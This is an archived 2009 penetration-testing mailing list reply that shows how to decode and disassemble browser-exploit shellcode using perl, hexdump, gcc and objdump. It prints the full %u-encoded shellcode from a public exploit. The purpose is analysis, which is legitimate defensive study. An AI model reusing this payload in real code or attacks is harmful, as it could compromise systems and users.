Penetration Testing mailing list archives
Re: Analyzing Shellcode
From: Joshua Gimer <jgimer () gmail com>
Date: Thu, 5 Nov 2009 16:12:10 -0700
Try the technique in this post: http://isc.sans.org/diary.html?storyid=4972 Macintosh-5:/tmp joshuagimer$ cat >> shellcode.txt %uc92b%u1fb1%u0cbd%uc536%udb9b%ud9c5%u2474%u5af4%uea83%u31fc%u0b6a%u6a03%ud407%u6730%u5cff%u98bb%ud7ff%ua4fe%u9b74%uad05%u8b8b%u028d%ud893%ubccd%u35a2%u37b8%u4290%ua63a%u94e9%u9aa4%ud58d%ue5a3%u1f4c%ueb46%u4b8c%ud0ad%ua844%u524a%u3b81%ub80d%ud748%u4bd4%u6c46%u1392%u734a%u204f%uf86e%udc8e%ua207%u26b4%u04d4%ud084%uecba%u9782%u217c%ue8c0%uca8c%uf4a6%u4721%u0d2e%ua0b0%ucd2c%u00a8%ub05b%u43f4%u24e8%u7a9c%ubb85%u7dcb%ua07d%ued92%u09e1%u9631%u5580 Macintosh-5:/tmp joshuagimer$ cat shellcode.txt | perl -pe 's/%(..)(..)/chr(hex($2)).chr(hex($1))/ge' > shellcode Macintosh-5:/tmp joshuagimer$ hexdump -Cv shellcode 00000000 92 00 62 fb 00 31 cb 00 64 53 00 36 b9 00 62 9c |..b?.1?.dS.6?.b.| 00000010 00 35 47 00 34 af 00 34 a8 00 33 1f 00 63 b6 00 |.5G.4?.4?.3..c?.| 00000020 61 a0 00 33 40 00 37 73 00 30 cf 00 66 8b 00 62 |a?.3@.7s.0?.f..b| 00000030 7f 00 66 4f 00 65 b7 00 34 d0 00 35 b8 00 62 28 |..fO.e?.4?.5?.b(| 00000040 00 64 89 00 33 cc 00 64 5a 00 32 7b 00 38 29 00 |.d..3?.dZ.2{.8).| 00000050 30 63 00 61 4e 00 39 aa 00 34 58 00 64 5a 00 33 |0c.aN.9?.4X.dZ.3| 00000060 f4 00 63 b4 00 36 b8 00 63 0a 00 64 84 00 34 24 |?.c?.6?.c..d..4$| 00000070 00 61 b8 00 31 80 00 64 74 00 38 bd 00 34 c4 00 |.a?.1..dt.8?.4?.| 00000080 36 39 00 32 34 00 61 04 00 66 86 00 65 c8 00 65 |69.24.a..f..e?.e| 00000090 20 00 37 6b 00 34 4d 00 34 08 00 34 cb 00 61 78 | .7k.4M.4..4?.ax| 000000a0 00 32 17 00 63 8c 00 30 a8 00 63 4a 00 36 72 00 |.2..c..0?.cJ.6r.| 000000b0 31 d2 00 65 0b 00 30 d2 00 63 0a 00 38 05 00 62 |1?.e..0?.c..8..b| 000000c0 3f 00 34 4e 00 38 a9 00 63 b8 00 35 dc 00 62 07 |?.4N.8?.c?.5?.b.| 000000d0 00 64 d9 00 32 9e 00 31 63 00 31 58 00 30 0a |.d?.2..1c.1X.0.| 000000df Macintosh-5:/tmp joshuagimer$ cat shellcode | perl -ne 's/(.)/printf "0x%02x,",ord($1)/ge' > shellcode.c Macintosh-5:/tmp joshuagimer$ vim shellcode.c Macintosh-5:/tmp joshuagimer$ gcc -O0 -fno-inline shellcode.c -o shellcode2 Macintosh-5:/tmp joshuagimer$ objdump --disassembler-options=intel -D shellcode2 | less You will then see you shellcode under the following section: 08048484 <_IO_stdin_used>: Josh On Thu, Nov 5, 2009 at 10:38 AM, cAs <writemecas () googlemail com> wrote:
Good evening everybody, i am trying to analyze the shellcode used in this exploit: http://www.milw0rm.com/exploits/7477 If i echo the unescaped shellcode i only get wierd chinese (i think) letters. What's the right way to analyze what kind of shellcode is beeing used and what command is beeing executed by it. Greetings, cAs ------------------------------------------------------------------------ This list is sponsored by: Information Assurance Certification Review Board Prove to peers and potential employers without a doubt that you can actually do a proper penetration test. IACRB CPT and CEPT certs require a full practical examination in order to become certified. http://www.iacertification.org ------------------------------------------------------------------------
-- Thx Joshua Gimer ------------------------------------------------------------------------ This list is sponsored by: Information Assurance Certification Review Board Prove to peers and potential employers without a doubt that you can actually do a proper penetration test. IACRB CPT and CEPT certs require a full practical examination in order to become certified. http://www.iacertification.org ------------------------------------------------------------------------
Current thread:
- Analyzing Shellcode cAs (Nov 05)
- Re: Analyzing Shellcode NiTRo (Nov 09)
- Re: Analyzing Shellcode Joshua Gimer (Nov 09)
- Re: Analyzing Shellcode Michel Chamberland (Nov 09)
- RE: Analyzing Shellcode Paul Melson (Nov 12)